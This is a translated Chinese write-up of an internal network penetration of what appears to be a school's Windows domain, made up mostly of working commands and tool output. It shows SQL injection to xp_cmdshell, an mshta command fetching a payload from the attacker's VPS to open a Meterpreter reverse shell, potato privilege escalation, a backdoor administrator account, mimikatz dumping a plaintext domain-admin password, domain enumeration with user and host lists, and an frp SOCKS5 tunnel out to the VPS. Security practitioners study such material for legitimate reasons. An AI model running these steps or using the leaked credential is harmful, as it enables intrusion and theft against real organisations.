A Detailed Internal Network Penetration Walkthrough (记一次详细的内网渗透过程)

Converted by SimpRead (简悦); original article at mp.weixin.qq.com

Source: 先知社区

External foothold

Getting a shell with sqlmap

sqlmap --sql-shell

The --sql-shell option gives an interactive SQL prompt over the injection point.

First check whether the xp_cmdshell extended procedure exists:

sql-shell> select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
[22:01:36] [INFO] fetching SQL SELECT statement query output: 'select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell''
[22:01:36] [INFO] resumed: '1'
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell': '1'

Enable xp_cmdshell:

sql-shell> EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
[09:48:09] [INFO] executing SQL data execution statement: 'EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE'
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE: 'NULL'

Try running a command:

sql-shell> exec master..xp_cmdshell 'whoami'
[09:48:58] [INFO] executing SQL data execution statement: 'exec master..xp_cmdshell 'whoami''
exec master..xp_cmdshell 'whoami': 'NULL'

No output came back. With --sql-shell, sqlmap sends an EXEC as a stacked query and never retrieves its result set, so the 'NULL' here means "no rows fetched", not that the command failed or that the service has been de-privileged (the account turns out to be NT Service\MSSQLSERVER, see below). To see command output over an injection, the output has to be written to a table and read back with a SELECT; sqlmap's --os-shell does exactly that, and is what is used next. Two identity queries first:

sql-shell> select @@servername
[23:02:04] [INFO] fetching SQL SELECT statement query output: 'select @@servername'
[23:02:05] [INFO] retrieved: 'NEWDATABASE'
select @@servername: 'NEWDATABASE'
sql-shell> select host_name()
[23:02:19] [INFO] fetching SQL SELECT statement query output: 'select host_name()'
[23:02:21] [INFO] retrieved: 'MAIL'
select host_name(): 'MAIL'

Note that @@servername is the SQL Server instance name (NEWDATABASE), while host_name() returns the name of the client workstation that opened the connection, here MAIL: the web application and the database run on different hosts, which is why no web root can be found on the database server later.
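The session above shows the three steps (check, enable, execute) but never sees the command's output. Added here as an editorial example, not from the original write-up: the same workflow as stacked T-SQL that first checks the privilege that enabling xp_cmdshell requires, then captures the command's stdout in a table so it can be read back through the injection. The table name dbo.cmd_out and the command are our choices; a permanent table is used on purpose, because each injected request is typically a fresh connection and a #temp table would not survive to the next statement. sqlmap's --os-shell does essentially this with its own table.

```sql
-- Added example (not from the original write-up). Assumes a stacked-query
-- injection point whose login is a member of sysadmin.
-- dbo.cmd_out and the command below are our choices.

-- 1. Who are we, and can we change server configuration?
--    sp_configure + RECONFIGURE needs ALTER SETTINGS, which sysadmin holds.
SELECT SYSTEM_USER                    AS login_name,
       IS_SRVROLEMEMBER('sysadmin')   AS is_sysadmin,     -- 1 = yes, 0 = no
       @@SERVERNAME                   AS instance_name,   -- instance, not necessarily the hostname
       SERVERPROPERTY('MachineName')  AS db_host,         -- the SQL Server's real machine name
       HOST_NAME()                    AS client_host;     -- the *client* (here: the web server)

-- 2. Is xp_cmdshell present, and is it already enabled?
SELECT name, value_in_use
FROM   sys.configurations
WHERE  name IN ('show advanced options', 'xp_cmdshell');

-- 3. Enable it (safe to repeat).
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;          RECONFIGURE;

-- 4. Run the command and keep its stdout in a real table so a later
--    SELECT (sent through the injection) can read it back.
IF OBJECT_ID('dbo.cmd_out', 'U') IS NOT NULL DROP TABLE dbo.cmd_out;
CREATE TABLE dbo.cmd_out (id INT IDENTITY(1,1), line NVARCHAR(4000));
INSERT INTO dbo.cmd_out (line) EXEC master..xp_cmdshell 'whoami /priv';

-- 5. Read it back in order, skipping the trailing NULL row xp_cmdshell emits.
SELECT line FROM dbo.cmd_out WHERE line IS NOT NULL ORDER BY id;

-- 6. Clean up: drop the table and put the configuration back.
DROP TABLE dbo.cmd_out;
EXEC sp_configure 'xp_cmdshell', 0;          RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
```

If step 1 reports is_sysadmin = 0, step 3 will fail with a permissions error and xp_cmdshell is not an option from this login; a value of 1 in step 2 before you touch anything means someone already enabled it, which is a finding on its own.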

sqlmap --os-shell

Moving into the internal network

The target system, as fingerprinted by sqlmap:

web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP
back-end DBMS: Microsoft SQL Server 2012

Mshta reverse shell

Various commands were tried, but output was slow and no web root could be found (consistent with the web server being MAIL rather than this host), so neither a webshell nor an exe could be dropped. An .hta payload fetched over HTTP is used instead. Open sqlmap's --os-shell with the saved request:

➜  ~ sqlmap -r /Users/apple/Desktop/1.txt --os-shell

Start the msf hta_server handler:

msf6 exploit(windows/misc/hta_server) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Using URL: http://0.0.0.0:8080/8HGLrG47OUEJ.hta
[*] Local IP: http://vps:8080/8HGLrG47OUEJ.hta
[*] Server started.

On the target, run:

mshta.exe http://vps:8080/8HGLrG47OUEJ.hta

msf output:

[*] ip   hta_server - Delivering Payload
[*] Sending stage (175174 bytes) to ip
[*] Meterpreter session 1 opened (vps_ip:4444 -> ip:61915) at 2020-12-04 10:01:42 +0800
msf6 exploit(windows/misc/hta_server) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                        Connection
  --  ----  ----                     -----------                        ----------
  1         meterpreter x86/windows  NT Service\MSSQLSERVER @ DATABASE  vps_ip:4444 -> ip:61915 (10.10.10.5)
msf6 exploit(windows/misc/hta_server) > sessions -i 1
[*] Starting interaction with 1...

Check the target's system information:

meterpreter > sysinfo
Computer        : DATABASE
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : zh_TW
Domain          : WEGO
Logged On Users : 14
Meterpreter     : x86/windows

Drop into a shell for more detail; if the output is garbled, set the code page first (chcp 65001):

C:\Windows\system32>chcp 65001
C:\Windows\system32>ipconfig /all
ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : database
   Primary Dns Suffix  . . . . . . . : xx.xx.x x.xx
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : xx.xx.x x.xx

Ethernet adapter NIC2:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet #4
   Physical Address. . . . . . . . . : 10-98-36-B0-ED-AE
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter NIC1:

   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet #3
   Physical Address. . . . . . . . . : 10-98-36-B0-ED-AD
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 10.10.10.5(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : 10.10.10.254
   DNS Servers . . . . . . . . . . . : 10.10.10.3
                                       10.10.10.2
   NetBIOS over Tcpip. . . . . . . . : Enabled

The host sits on an internal network. Its two DNS servers, 10.10.10.3 and 10.10.10.2, are the obvious domain-controller candidates (in a Windows domain the DCs normally run DNS); this is confirmed later when AD1 and AD2 resolve to exactly these addresses.

Privilege escalation

Escalating with MSF

Check the current user:

C:\Windows\system32>whoami
whoami
nt service\mssqlserver

Check the system information; quite a lot of patches are installed.

systeminfo

Alternatively, msf's local_exploit_suggester can look for usable local exploits. It matches candidates against the session's architecture (x86 here, on an x64 host), so migrating into an x64 process first, or using an x64 payload, gives more reliable results:

msf6 > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 35 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed

MS16-075 (RottenPotato): running the msf module directly crashed the session. Uploading an exe was tried next, but the target directory was not writable; the right move is to find a writable directory first, and one was found later (C:\Windows\TAPI is used for uploads below).

meterpreter > upload /tmp/beacon.exe C:/Windows/Temp

Escalating with Cobalt Strike

Load the aggressor script, available at:

https://github.com/scanfsec/AggressorCNA/blob/master/reflectiveJuicyPotato/juicypotato.cn

beacon> elevate juicypotato http
[*] Task Beacon to run windows/beacon_http/reverse_http (1.1.1.1:7777) via JuicyPotato (ms16-075)
[+] host called home, sent: 599618 bytes
[+] received output:
.
[+] received output:
..
[+] received output:
..
[+] received output:
.
[+] received output:

[+] authresult 0
[*] {4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

A SYSTEM token was obtained and CreateProcessWithTokenW succeeded, but no new beacon checked in, so this attempt failed. Next, the RottenPotato script:

[*] Task Beacon to run windows/beacon_http/reverse_http (1.1.1.1:7777) via RottenPotato (ms16-075)
[*] Tasked beacon to spawn NTLM DCOM->RPC NTLM Reflection (MS16-075)
[+] host called home, sent: 256865 bytes

A new beacon comes back holding a SYSTEM token:

beacon> shell whoami
[*] Tasked beacon to run: whoami
[+] host called home, sent: 37 bytes
[+] received output:
nt service\mssqlserver
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)

whoami inside the spawned cmd.exe still reports the MSSQL service account, while getuid reports NT AUTHORITY\SYSTEM: the beacon thread is impersonating a SYSTEM token, but the process itself, and the children that shell creates, still run as NT Service\MSSQLSERVER. To work as a fully privileged user, inject into or spawn from a process that genuinely runs under that account, which is what is done next. First, the local groups on the host:

beacon> shell net localgroup
[*] Tasked beacon to run: net localgroup
[+] host called home, sent: 45 bytes
[+] received output:

Aliases for \\DATABASE

-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Distributed COM Users
*Event Log Readers
*Guests
*HelpLibraryUpdaters
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*SQLServer2005SQLBrowserUser$NEWDATABASE
*SQLServerMSASUser$NEWDATABASE$MSSQLSERVER
*Users
*WinRMRemoteWMIUsers__
The command completed successfully.

Using the current beacon, inject into a process owned by Administrator (the domain Administrator is logged on to this host, as the logonpasswords output below shows). This yields a new beacon running as Administrator.

Creating a user

Create a local user and add it to the Administrators group (only the group-add step is in the capture):

beacon> shell net localgroup Administrators good /add
[*] Tasked beacon to run: net localgroup Administrators good /add
[+] host called home, sent: 70 bytes
[+] received output:
The command completed successfully.

Verify the Administrators group membership:

beacon> shell net localgroup Administrators
[*] Tasked beacon to run: net localgroup Administrators
[+] host called home, sent: 60 bytes
[+] received output:
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
good
HelpAssistant
WEGO\Domain Admins
The command completed successfully.

Two things stand out: WEGO\Domain Admins is a member of the local Administrators group, and HelpAssistant (the Remote Assistance account) sits in Administrators as well, which is unusual and worth noting on its own. Next, port scan the foothold host:

beacon> portscan 10.10.10.5 1-1024,3389,5000-6000 arp 1024
[*] Tasked beacon to scan ports 1-1024,3389,5000-6000 on 10.10.10.5
[+] host called home, sent: 93245 bytes
[+] received output:
(ARP) Target '10.10.10.5' is alive. 10-98-36-B0-ED-AD
10.10.10.5:5985

[+] received output:
10.10.10.5:3389

[+] received output:
10.10.10.5:139
10.10.10.5:135
10.10.10.5:80
10.10.10.5:445 (platform: 500 version: 6.3 name: DATABASE domain: WEGO)
Scanner module is complete

RDP (3389) and WinRM (5985) are open, so an interactive login is possible once credentials are available. Dump credentials with mimikatz (logonpasswords):

beacon> logonpasswords
    wdigest :   
     * Username : Administrator
     * Domain   : WEGO
     * Password : jo6ek6vul3vm,6

The wdigest provider still holds the plaintext password of WEGO\Administrator, a domain admin logged on to this host. (On Server 2012 R2, WDigest plaintext caching is off unless UseLogonCredential has been enabled, so its presence is itself a misconfiguration worth reporting.) With a Domain Admin password in hand, the domain controllers are the next target. Start a SOCKS proxy in the beacon:

beacon> socks 1070
[+] started SOCKS4a server on: 1070
[+] host called home, sent: 16 bytes

The DCs are the target, so a SOCKS proxy is attached (CS's SOCKS4 is very unreliable; frp was used later instead, see the proxy section below). Check which domain the host belongs to:

beacon> shell net config Workstation
[*] Tasked beacon to run: net config Workstation
[+] host called home, sent: 53 bytes
[+] received output:
Computer name                        \\DATABASE
Full Computer name                   database.xx.xx.x x.xx
User name                            Administrator

Workstation active on
    NetBT_Tcpip_{2B6B95FB-22AC-4BE5-9B0E-6778A02AF68C} (109836B0EDAD)

Software version                     Windows Server 2012 R2 Standard

Workstation domain                   WEGO
Workstation Domain DNS Name          xx.xx.x x.xx
Logon domain                         WEGO

COM Open Timeout (sec)               0
COM Send Count (byte)                16
COM Send Timeout (msec)              250
The command completed successfully.

获取域内的基础信息

List the domains visible from this host:

beacon> shell net view /domain
[*] Tasked beacon to run: net view /domain
[+] host called home, sent: 47 bytes
[+] received output:
Domain

-------------------------------------------------------------------------------
KG                   
WEGO                 
WORKGROUP            
The command completed successfully.

Three domains are visible: KG, WEGO (the host's own) and WORKGROUP. List the WEGO domain controllers:

beacon> shell net group "domain controllers" /domain
[*] Tasked beacon to run: net group "domain controllers" /domain
[+] host called home, sent: 69 bytes
[+] received output:
The request will be processed at a domain controller for domain xx.xx.x x.xx.

Group name     Domain Controllers
Comment        All domain controllers in the domain

Members

-------------------------------------------------------------------------------
AD1$                     AD2$                     AD3$                     
The command completed successfully.


Resolve the domain controllers to IP addresses (all three answer with TTL=128, i.e. Windows hosts on the same segment):

beacon> shell ping AD1.xx.xx.x x.xx
[*] Tasked beacon to run: ping AD1.xx.xx.x x.xx
[+] host called home, sent: 54 bytes
[+] received output:

Pinging AD1.xx.xx.x x.xx [10.10.10.2] with 32 bytes of data:
Reply from 10.10.10.2: bytes=32 time<1ms TTL=128
Reply from 10.10.10.2: bytes=32 time<1ms TTL=128
Reply from 10.10.10.2: bytes=32 time<1ms TTL=128
Reply from 10.10.10.2: bytes=32 time<1ms TTL=128

Ping statistics for 10.10.10.2:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

beacon> shell ping AD2.xx.xx.x x.xx
[*] Tasked beacon to run: ping AD2.xx.xx.x x.xx
[+] host called home, sent: 54 bytes
[+] received output:

Pinging AD2.xx.xx.x x.xx [10.10.10.3] with 32 bytes of data:
Reply from 10.10.10.3: bytes=32 time<1ms TTL=128
Reply from 10.10.10.3: bytes=32 time<1ms TTL=128
Reply from 10.10.10.3: bytes=32 time<1ms TTL=128
Reply from 10.10.10.3: bytes=32 time<1ms TTL=128

Ping statistics for 10.10.10.3:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

beacon> shell ping AD3.xx.xx.x x.xx
[*] Tasked beacon to run: ping AD3.xx.xx.x x.xx
[+] host called home, sent: 54 bytes
[+] received output:

Pinging AD3.xx.xx.x x.xx [10.10.10.4] with 32 bytes of data:
Reply from 10.10.10.4: bytes=32 time<1ms TTL=128
Reply from 10.10.10.4: bytes=32 time<1ms TTL=128
Reply from 10.10.10.4: bytes=32 time<1ms TTL=128
Reply from 10.10.10.4: bytes=32 time<1ms TTL=128

Ping statistics for 10.10.10.4:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

AD1 is 10.10.10.2, AD2 is 10.10.10.3 and AD3 is 10.10.10.4; the first two are the DNS servers seen in ipconfig. List the Domain Admins group:

beacon> shell net group "domain admins" /domain
[*] Tasked beacon to run: net group "domain admins" /domain
[+] host called home, sent: 64 bytes
[+] received output:
The request will be processed at a domain controller for domain xx.xx.x x.xx.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            albert_huang             chuck_ho                 
jerrytsao                juinyih                  se                       
srj                      wegovpn2020              
The command completed successfully.

Eight accounts hold Domain Admin, including Administrator, whose password was just recovered. List the domain users (output truncated here):

beacon> shell net user /domain
[*] Tasked beacon to run: net user /domain
[+] host called home, sent: 47 bytes
[+] received output:
The request will be processed at a domain controller for domain xx.xx.x x.xx.


User accounts for \\AD2.xx.xx.x x.xx

-------------------------------------------------------------------------------
098                      201sandy                 203savanah               
204hanna                 205vanessa               213amy                   
2305                     3557                     526alice                 
account                  Administrator            affair                   
albert_huang             alice31707               alison                   
amy                      amyjccd                  andrewmunro              
anita                    anne                     ap7653                   
argreschler              ashinlover               ashleychen               
beauc                    berrywu                  bkmanager                
brandonolen              busm                     caca                     
camy4648                 carolina                 caroline                 
cashier                  charlie                  chellie72                
cherry2011               cheryllin                chi                      
chi0707                  CHIAEN                   christina                
christinelee             chuanmien                chuck_ho                 
chunying                 cindykyang               cleeve                   
collinsko0109            cyajen0717               Dale                     
dfl001                   dianahou                 director                 
dola                     dperabo                  eileen5717               
epayding                 esansan                  eslteacher               
eusebia                  evanceho                 faithtien                
fatfat1188               fayina                   flowerrr                 
guccichia                Guest                    gvholley                 
haiyou                   ikuchen                  indigododos              
iriscai                  IUSER_WEGONET            IUSER_WGPS               
IUSR_MAIL                ivyc                     ivyhou                   
IWAM_MAIL                j5218                    Jacobson8959             
jennifer                 jennifer_liang           jerrytsao                
jessicama711             jgtoma                   jih455

List the hosts visible through the browser service:

beacon> shell net view
[*] Tasked beacon to run: net view
[+] host called home, sent: 39 bytes
[+] received output:
Server Name            Remark

-------------------------------------------------------------------------------
\\3060-1E                                                                      
\\3060-2E                                                                      
\\3060-2F                                                                      
\\3060-4B                                                                      
\\3060-5C                                                                      
\\3060-5D                                                                      
\\ACADEMIC                                                                     
\\ACCOUNT-3070                                                                 
\\ACCOUNT3050          Accounting lead                                         
\\AD1                                                                          
\\AD2                                                                          
\\AD3                                                                          
\\AFFAIRS-3060                                                                 
\\ASUS-500G4-PC                                                                
\\CARD100              Time-clock host                                         
\\CDTOWER17                                                                    
\\DATABASE                                                                     
\\DELL7020B-36                                                                 
\\DFL-3340-67                                                                  
\\DFL-FILES2017                                                                
\\FILES                                                                        
\\FILES2                                                                       
\\LIB-3020-83                                                                  
\\LIB-7020-82                                                                  
\\MAIL                                                                         
\\MEDIA-DOME                                                                   
\\PCSCRIBE-7                                                                   
\\PCTEACHER-100                                                                
\\PERSONNEL-3060                                                               
\\STPC-01                                                                      
\\STPC-02                                                                      
\\STPC-03                                                                      
\\STPC-04                                                                      
\\STPC-05                                                                      
\\STPC-06                                                                      
\\STPC-07                                                                      
\\STPC-08                                                                      
\\STPC-09                                                                      
\\STPC-10                                                                      
\\STPC-11                                                                      
\\STPC-12                                                                      
\\STPC-13                                                                      
\\STPC-14                                                                      
\\STPC-15                                                                      
\\STPC-16                                                                      
\\STPC-17                                                                      
\\STPC-18                                                                      
\\STPC-19                                                                      
\\STPC-20                                                                      
\\STPC-21                                                                      
\\STPC-22                                                                      
\\STPC-23                                                                      
\\STPC-24                                                                      
\\STPC-25                                                                      
\\STPC-26                                                                      
\\STPC-27                                                                      
\\STPC-28                                                                      
\\STPC-29                                                                      
\\STPC-30                                                                      
\\STPC-31                                                                      
\\STPC-32                                                                      
\\STPC-33                                                                      
\\STPC-34                                                                      
\\STPC-35                                                                      
\\STPC-36                                                                      
\\STPC-37                                                                      
\\STPC-39                                                                      
\\STPC-40                                                                      
\\STPC-41                                                                      
\\STPC-42                                                                      
\\STPC-47                                                                      
\\STUFILES                                                                     
\\WIN101C                                                                      
\\WIN106D                                                                      
\\WIN10MUSIC56

To list the hosts of one specific domain: net view /domain:XXX. Now list every computer account in the domain:

beacon> shell net group "domain computers" /domain
[*] Tasked beacon to run: net group "domain computers" /domain
[+] host called home, sent: 67 bytes
[+] received output:
The request will be processed at a domain controller for domain xx.xx.x x.xx.

Group name     Domain Computers
Comment        All workstations and servers joined to the domain

成员

-------------------------------------------------------------------------------
1A86TV$                  2003R2-32BITS$           2003SERVER$              
3060-1E$                 3060-1F$                 3060-2A$                 
3060-2B$                 3060-2C$                 3060-2D$                 
3060-2E$                 3060-2F$                 3060-4A$                 
3060-4B$                 3060-4C$                 3060-4D$                 
3060-5A$                 3060-5B$                 3060-5C$                 
3060-5D$                 3060-6E$                 3060-6F$                 
3060CALLIGRAPHY$         4730WORK$                ACADEMIC$                
ACCOUNT3050$             ACCOUNT-3070$            ACCOUNT-7$               
ACTIVITES-3020A$         ACTIVITES-3020B$         ACTIVITIES3020C$         
ACTIVITY-181$            AD2-NEW$                 AD3-OLD$                 
ADMINISTRATOR$           AFFAIRS-3060$            ALBERT_HUANG$            
ANNALIU$                 ANNALIU-XP-VM$           ASUS-500G4-PC$           
B8AC6F362198$            B8AC6F3C1711$            B8AC6F3C727F$            
CALLIGRAPHY3060$         CARD100$                 CASHIER-3070$            
CASHIER7$                CDTOWER17$               CG-86TV$                 
CHIEF-PE$                CURRICULUM-2019$         CURRICULUM-3060$         
DATABASE$                DB2019$                  DELL-2420-3$             
DELL7020B-36$            DELL7020B-PC$            DELL9020-PC$             
DELLPC$                  DFL-3340-65$             DFL-3340-66$             
DFL-3340-67$             DFL-3340-70$             DFL-3340ENG-68$          
DFL-3340ENG-69$          DFL-3380-81$             DFL-3380-82$             
DFL-3400-85$             DFL-3400-86$             DFL-4730-80$             
DFL-ACER-82$             DFL-ACER-84$             DFL-ACTIVITIES$          
DFL-CURRICULUM$          DFL-FILES2017$           DFL-NB1$                 
DFL-NB10$                DFL-NB11$                DFL-NB3$                 
DFL-NB4$                 DFL-NB5$                 DFL-NB6$                 
DFL-NB7$                 DFL-NB9$                 DFL-SUPERVISOR2$         
DIR-AFFAIRS$             DIR-DFL$                 DIR-JAPAN$               
DIR-STUDENT$             DISCIPLINE-3060$         ESL-603$                 
ESLNB-2420-C$            ESLNB-2420-R$            ESL-P243-1$              
ESL-P243-2$              ESL-P243-3$              ESL-P243-4$              
FILES$                   FILES2$                  FITNESSCENTER$           
HAPPY-HOUSE$             HEALTH-3060$             HEALTH7$                 
HEALTH-SERVICE$          HYGIENE-3070$            HYPERV2008R2$            
JAPAN77-TEACHER$         KITCHEN3020$             KITCHEN-7-60$            
LIB-3020-83$             LIB-3020-84$             LIB-3020-85$             
LIB-3020-86$             LIB-3020-87$             LIB3060TEACHER$          
LIB-3060TEACHER$         LIB-7020-82$             LIB-TEACHER$             
MAIL$                    MAIL2$                   MEDIA-DOME$              
ML20936$                 ML20936-PC$              nas8be8d1$               
nasbfa3ee$               NEW_NB01$                NEW-WIN$                 
NWIN7-0$                 NWIN7-1$                 NWIN7-2$                 
NWIN7-3$                 NWIN7-4$                 OLD-DATA814$             
OLDDATABASE$             PCSCRIBE-7$              PCTEACHER-100$           
PE-3060$                 PERSONNEL-3060$          PRINCIPAL$               
PRINCIPAL-21$            PROGRAMER$               REGISTRAR-3070$          
SCHOOL2003$              SCHOOL-3070$             SCHOOL-PC-01$            
SCHOOL-PC-02$            SCHOOL-SYS$              SCHOOLWU-PC$             
SE$                      SE7$                     SE-PC$                   
SE-XP$                   ST-00$                   ST000$                   
ST-000$                  ST50$                    ST50PC$                  
STPC-01$                 STPC-02$                 STPC-03$                 
STPC-04$                 STPC-05$                 STPC-06$                 
STPC-07$                 STPC-08$                 STPC-09$                 
STPC-10$                 STPC-11$                 STPC-12$                 
STPC-13$                 STPC-14$                 STPC-15$                 
STPC-16$                 STPC-17$                 STPC-18$                 
STPC-19$                 STPC-20$                 STPC-21$                 
STPC-22$                 STPC-23$                 STPC-24$                 
STPC-25$                 STPC-26$                 STPC-27$                 
STPC-28$                 STPC-29$                 STPC-30$                 
STPC-31$                 STPC-32$                 STPC-33$                 
STPC-34$                 STPC-35$                 STPC-36$                 
STPC-37$                 STPC-38$                 STPC-39$                 
STPC-40$                 STPC-41$                 STPC-42$                 
STPC-43$                 STPC-44$                 STPC-45$                 
STPC-46$                 STPC-47$                 STPC-48$                 
STPC-49$                 STPREPC$                 STPRE-PC$                
STUFILES$                SURVEILLANCE$            T1-WIN7$                 
TEACHER-WU$              TEST-WIN10-1$            TRYPC001$                
VICE-DIRECTOR$           VICE-PRINCIPAL$          VIDEOSPIDER$             
WEGO-DC3$                WEGO-DC4$                WIN101A$                 
WIN101B$                 WIN101C$                 WIN101D$                 
WIN103A$                 WIN103B$                 WIN103C$                 
WIN103D$                 WIN103E$                 WIN103F$                 
WIN104E$                 WIN104F$                 WIN105E$                 
WIN105F$                 WIN106A$                 WIN106B$                 
WIN106C$                 WIN106D$                 WIN106E$                 
WIN10ART12$              WIN10-ART12$             WIN10ART34$              
WIN10ART56$              WIN10MULTI$              WIN10MUSIC34$            
WIN10MUSIC56$            WIN10OFFICE01$           WIN10OFFICE02$           
WIN10OFFICE03$           WIN10OFFICE04$           WIN10SCIENCE34$          
WIN10SCIENCE56$          WIN7PROX86-01$           WIN7VM$                  
WIN7VM-AP$               WU-TEACHING$

Collect the domain's group, session, local-group and ACL data with SharpHound for analysis in BloodHound:

beacon> shell C:\Windows\TAPI\SharpHound.exe -c all
[*] Tasked beacon to run: C:\Windows\TAPI\SharpHound.exe -c all
[+] host called home, sent: 68 bytes
[+] received output:
------------------------------------------------
Initializing SharpHound at 03:37 PM on 2020/12/8
------------------------------------------------

Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain xx.xx.x x.xx using path CN=Schema,CN=Configuration,DC=xx,DC=xx,DC=xx,DC=xx
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM

[+] received output:
[+] Creating Schema map for domain 10.10.11.13 using path CN=Schema,CN=Configuration,DC=10,DC=10,DC=11,DC=13
Status: 1528 objects finished (+1528 52.68966)/s -- Using 50 MB RAM

[+] received output:
Status: 1674 objects finished (+146 28.37288)/s -- Using 49 MB RAM

[+] received output:
Status: 1675 objects finished (+1 18.61111)/s -- Using 47 MB RAM

[+] received output:
Status: 1675 objects finished (+0 13.95833)/s -- Using 47 MB RAM

[+] received output:
Status: 1676 objects finished (+1 11.63889)/s -- Using 47 MB RAM
Enumeration finished in 00:02:24.3737596
Compressing data to .\20201208153758_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 03:40 PM on 2020/12/8! Happy Graphing!

Internal proxy setup

At first I used CS's built-in SOCKS4 proxy but found it very unstable, so I switched to frp for the tunnel.

Server side (VPS), frps.ini:

[common]
bind_addr = 0.0.0.0
bind_port = 7000
dashboard_port = 7500
dashboard_user = good
dashboard_pwd = good

Browsing to port 7500 on the VPS shows the frps dashboard.

Target host

frpc.ini, which exposes a SOCKS5 proxy on port 60000 of the VPS:

[common]
server_addr = 1.1.1.1
server_port = 7000

[socks5]
type = tcp
remote_port = 60000
plugin = socks5
use_encryption = true
use_compression = true

Upload frpc and its configuration through the beacon (C:\Windows\TAPI is the writable directory found earlier):

beacon> upload /Users/apple/Documents/steady-sec/NW/frp/frpc_full.ini (C:\Windows\TAPI\frpc_full.ini)
[*] Tasked beacon to upload /Users/apple/Documents/steady-sec/NW/frp/frpc_full.ini as C:\Windows\TAPI\frpc_full.ini
[+] host called home, sent: 8402 bytes
beacon> upload /Users/apple/Documents/steady-sec/NW/frp/frpc.ini (C:\Windows\TAPI\frpc.ini)
[*] Tasked beacon to upload /Users/apple/Documents/steady-sec/NW/frp/frpc.ini as C:\Windows\TAPI\frpc.ini
[+] host called home, sent: 195 bytes
[*] Tasked beacon to upload /Users/apple/Documents/steady-sec/NW/frp/frpc as C:\Windows\TAPI\frpc

fscan is staged the same way and can also be run directly from the foothold, for example to find hosts with 445 open:

beacon> shell C:\Windows\TAPI\fscan64.exe -h 10.10.10.1/24 -p 445

In a Windows 10 VM, configure Proxifier with the SOCKS5 proxy on the VPS; afterwards any tool can be sent through it via right-click -> Proxifier -> select that proxy.
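The frp configuration above is the kind of thing that comes back to bite the tester: the frps dashboard is bound on every interface with the password "good", and neither side sets a token, so anyone who finds port 7000 on the VPS can register their own proxies there, and anyone who finds port 60000 gets an unauthenticated SOCKS5 into the target network. The corrected pair below is an editorial example, not the author's configuration; the token, password and SOCKS credentials are placeholders to be replaced with long random values.

```ini
# Added example, not the original write-up's configuration.
# Placeholders in <angle brackets> are assumptions; generate real random values.

# ---- frps.ini (VPS) ----
[common]
bind_addr = 0.0.0.0
bind_port = 7000
token = <long-random-shared-secret>   # every frpc must present this, or it is refused
dashboard_addr = 127.0.0.1            # not on the public interface; reach it over an SSH port-forward
dashboard_port = 7500
dashboard_user = ops
dashboard_pwd = <strong-password>

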